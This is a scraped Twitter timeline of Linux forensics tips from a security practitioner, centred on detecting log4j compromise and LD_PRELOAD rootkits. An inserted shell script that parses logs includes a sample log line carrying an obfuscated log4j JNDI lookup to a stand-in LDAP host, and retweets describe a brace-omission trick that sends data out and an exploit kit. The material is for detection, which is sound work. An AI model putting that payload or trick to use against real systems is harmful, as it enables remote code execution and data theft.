I am retiring this social media account. Find me as @hal_pomeranz@infosec.exchange

Orlando, FL
Joined November 2008
Anyone looking for a SOC manager role? My company is hiring. Comp package is best I’ve seen anywhere and the team is awesome. Some excellent talent to work with. DM me for details #infosecjobs #cybersecurityjobs
We have another session of @hal_pomeranz's course, "Linux Forensics," from Feb. 1-4, 2022! 10% of this course will be donated to @RuralTechFund! Check out what they do here: ruraltechfund.org/ Register for Hal's course here: antisyphontraining.com/linux… @Antisy_Training
PSA - The people who are actually working the problem don't give a crap how you pronounce #log4j
Hal Pomeranz retweeted
Don't know what an Azure Run Command is? Neither did I when we first stumbled on an attacker abusing this during a recent IR case. We wrote a short blog on these and what to look for if you're writing detections for your Azure VMs. mandiant.com/resources/azure…
Hal Pomeranz retweeted
This is fantastic research and gives some good insight into what's going on in the phishing ecosystem.
I promised I would write a report covering my phishing research in 2021. That report is now live: steved3.io/data/Phishing-202… Shout out to @AmandaFGoedde for helping me edit, as well as @ninoseki for making Miteru, and @urlscanio for creating an awesome tool to help defenders.
Kinsing cryptomining Linux malware has adopted #log4j to exploit new hosts. It is also bringing along a stealth rootkit to hide. In this article we go over what it is doing and how you can decloak it for incident response: sandflysecurity.com/blog/log…
You can also use these pipelines for other data sources. The "cat access.log | sed 's/.*"\([^"]*\)"$/\1/'" is how I'm extracting the user agent strings from the Apache log format. Everything after that is shell idioms you can apply to any data.
Encoded #log4j user agents are longer than normal user agent strings: "cat access.log | sed 's/.*"\([^"]*\)"$/\1/' | sort -u | while read str; do len=$(echo $str | wc -c); echo -e $len\\t$str; done | sort -n" Sort unique user agent strings by length, ascending
Looking for #log4j encoded user agents in Apache "combined" access log format: "cat access.log | sed 's/.*"\([^"]*\)"$/\1/' | sort | uniq -c | sort -rn" Histogram of all user agents in descending order (unique encoded user agents right above your shell prompt)
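The user-agent pipelines from the tweets above (field extraction, histogram, sort-by-length), as an added shell example that is not from the original thread, run over a constructed Apache "combined" log sample. The log lines, the scanner.example host and the function names are assumptions; the length step uses the shell's own string length instead of wc -c, so it does not count the trailing newline.

```shell
#!/bin/sh
# Constructed sample of Apache "combined" access log lines (not real traffic).
# The last quoted field is the User-Agent; one line carries a log4j-style lookup string.
SAMPLE_LOG='203.0.113.5 - - [12/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [12/Dec/2021:10:00:02 +0000] "GET /about HTTP/1.1" 200 128 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [12/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 404 0 "-" "curl/7.68.0"
192.0.2.9 - - [12/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://scanner.example:1389/a}"'

# Extract the User-Agent field: everything inside the final pair of double quotes.
user_agents() {
    printf '%s\n' "$SAMPLE_LOG" | sed 's/.*"\([^"]*\)"$/\1/'
}

# Histogram of user agents, most common first; one-off strings land at the bottom.
ua_histogram() {
    user_agents | sort | uniq -c | sort -rn
}

# Unique user agents with their length, shortest first; encoded lookups sit at the end.
ua_by_length() {
    user_agents | sort -u | while IFS= read -r ua; do
        printf '%d\t%s\n' "${#ua}" "$ua"
    done | sort -n
}

# Count user agents containing a "${" lookup opener. Matching the opener alone also
# catches payloads that omit the closing brace.
ua_suspicious() {
    user_agents | grep -cF '${'
}

ua_histogram
ua_by_length
ua_suspicious
```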
Hal Pomeranz retweeted
Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long as the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP!
Hal Pomeranz retweeted
Someone is angry #log4j
Hal Pomeranz retweeted
"as long as people write parsers and connect them to the internet, i'll have work." --anon
Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target...
#log4j has resulted in many Linux system breaches. The Linux forensics cheatsheet below can find many of the artifacts post-compromise. If you want to automate all of this, you can get a free license of @SandflySecurity on our website.
Image version of the Linux Compromise Detection Cheatsheet for the PDF-averse. #sandflysecurity #DFIR #threathunting
You want to see what LD_PRELOAD is set to? "grep -l LD_PRELOAD /proc/[0-9]*/environ | while read file; do echo $file:; cat $file | tr \\000 \\n | grep LD_PRELOAD; echo; done"
Haven't yet been seeing this with #log4j but be aware that LD_PRELOAD rootkits are circulating in the wild. Use of LD_PRELOAD is uncommon, so spot suspicious processes with "grep -l LD_PRELOAD /proc/[0-9]*/environ"
FYI recent malware uses LD_PRELOAD to hide behind legit exe paths. sansec.io/research/nginrat
Replying to @d3tm4r @strandjs
The units for "-mtime" etc. are in days
Hal Pomeranz retweeted
If you need help with Linux Forensics, please check out my repo with lots of content at the URL below, plus check @CraigHRowland and @hal_pomeranz work too #DFIR #log4j linuxdfir.ashemery.com/ #DFIR #log4j
Or just try: "ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / {print $NF}' | sort" Shows all EXE paths in sorted order making it easier to spot outliers #log4j
Another fun Linux command line: "sudo ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / && !/\/usr\/(lib(exec)?|s?bin)\// {print $9, $10, $11}' | sed 's,/proc/\([0-9]*\)/exe,\1,'" Display PIDs with non-standard EXE paths